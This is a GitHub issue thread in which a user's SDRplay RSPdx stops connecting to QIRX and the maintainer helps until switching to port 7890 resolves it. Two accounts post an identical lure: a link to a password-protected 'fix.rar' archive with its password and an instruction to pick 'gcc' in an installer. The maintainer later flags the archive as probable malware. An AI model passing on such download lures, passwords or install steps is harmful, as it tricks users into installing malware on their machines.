### ISSUE TITLE
RSPDX not connecting

### ISSUE THREAD

**Issue by MikeFallon** [softsyst/qirx_issues#157]
Hi Clem, I have come across a problem with my RSPDX not connecting with QIRX v4. It has been working fine until this morning but now, every time I try to connect, I get a pop up saying it can't connect TCP/IP. I have tried reinstalling QIRX, different USB ports on my PC and changing the port in QIRX but it won't work. By the way, the RSPDX works in other SDR software so it doesn't appear that is the problem. I have also reinstalled the SDRPlay API too.
Can you offer any help please?

Thanks

Mike

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by softsyst** [comment]
Hi Mike,
My usual comment : With "doesn't work" I can not help in any way. I need screenshots, in particular from the RSP3_tcp.exe. If it is deleted immediately, please un-select "Autostart" in the Settings, start RSP3_tcp.ex with the correct parameters manually and show me a screenshot of the command-line window. 
If I get these, it will perhaps be possible to help. Otherwise not.

Thanks,
Clem

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by softsyst** [comment]
Hi all,
before short, a malevolent user tried to trick you to the download of a file **fix.rar**. 
**PLEASE TREAT WITH UTTER CAUTION. The encrypted download most probably contains malware. Please DO NOT OPEN.**
The file has been uploaded to the archive from where to download from the Russian Federation today.

**Comment by MikeFallon** [comment]
Here's my RSP3-tcp.exe Clem...
![Snap4](https://github.com/user-attachments/assets/e366d4e7-7367-4b83-b7db-cace7f48d65e)

**Comment by softsyst** [comment]
This is looking good, so far. Th RSP3_tcp recognizes the hardware and waits for a connection. It also seems to communicate properly with the sdrPlay service.

Next, please put the port number 7890 and the IP address 127.0.0.1 into the "Settings" of the Rx you are using, in QIRX, and observe what's happening when you click on the blue triangle. Please make another screenshot of the command-line window of RSP3_tcp. But before trying to connect, activate the QIRX Debug log in the Settings.

**Comment by MikeFallon** [comment]
Here's port 7890
![Port 7890](https://github.com/user-attachments/assets/03a1f077-e232-426c-81c4-eb8e42428d42)

I enabled debug logging.

**Comment by MikeFallon** [comment]
Ah, I restarted QIRX again using port 7890 and it's working again!! Thanks very much Clem. Is it OK to continue using 7890 in the future?
Mike

**Comment by softsyst** [comment]
Did you try to connect? the RSP3_tcp did not get a connect request. What happened in QIRX? In case of appearing the tcp/ip error message, please show a screenshot of the "Settings".
The latest two logfiles would be good. You find them here:
`C:\Users\<your user name>\AppData\Local\qirxLoggings`

**Comment by softsyst** [comment]
Ok, please disregard then my last posting. 
Yes, any port is ok, 7890 is the standard port. But the port must not be used by another program on the machine. This is a requirement of TCP/IP. Thus, if it does not work with "Autostart" on and 1234 as the port, you might try other ports, or even 7890.

**Comment by softsyst** [comment]
As the issue has been resolved, I close this one.
